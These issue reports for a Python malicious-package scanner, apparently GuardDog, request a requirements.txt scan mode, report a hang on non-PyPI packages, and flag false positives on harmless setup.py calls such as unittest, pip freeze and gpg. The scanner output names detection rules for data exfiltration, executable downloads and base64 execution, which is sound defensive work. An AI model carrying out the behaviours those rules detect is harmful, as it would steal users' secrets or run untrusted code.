Add a mode to scan a `requirements.txt` file

As a: developer
I need to: be able to run pysecurity on my project's dependencies
So that: I can be alerted if one of my dependencies is malicious

Sample usage (suggestion):

python3 -m pysecurity -n /my/project/requirements.txt # Keep the same argument as a local package, and detect if it's a text file

# or
python3 -m pysecurity --requirements /my/project/requirements.txt

Guarddog hanging when it receives 404 from PyPi

We have a bunch of internal libraries that are not uploaded to pypi (and never will be) but rather included in a form

${package} @ file:///tmp/${package}-${version}.tar.gz

Whenever guarddog finds such a package, it tries to load it from PyPI, and then the whole process hangs and doesn't complete execution.

False positive: running python unittests

{"shady-links": {}, "exfiltrate-sensitive-data": {}, "download-executable": {}, "exec-base64": {}, "code-execution": {"pyadt-1.0.0/setup.py:52": "        errno = call([\"python\", \"-m\", \"unittest\", \"discover\"])"}, "cmd-overwrite": {}, "typosquatting": []

in pyadt

False positive for gpg and pip

I've seen that one a few times, maybe we can whitelist "pip freeze" and gpg?

Scanning oedtools
{"secrets": {}, "shady-links": {}, "post-systeminfo": {}, "download-executable": {}, "exec-base64": {}, "code-execution": {"oedtools-1.0.2/setup.py": ["        if os.system('pip freeze | grep twine'):", "                os.system('gpg --detach-sign -a {}'.format(p))"]}, "cmd-overwrite": {}, "typosquatting": null}
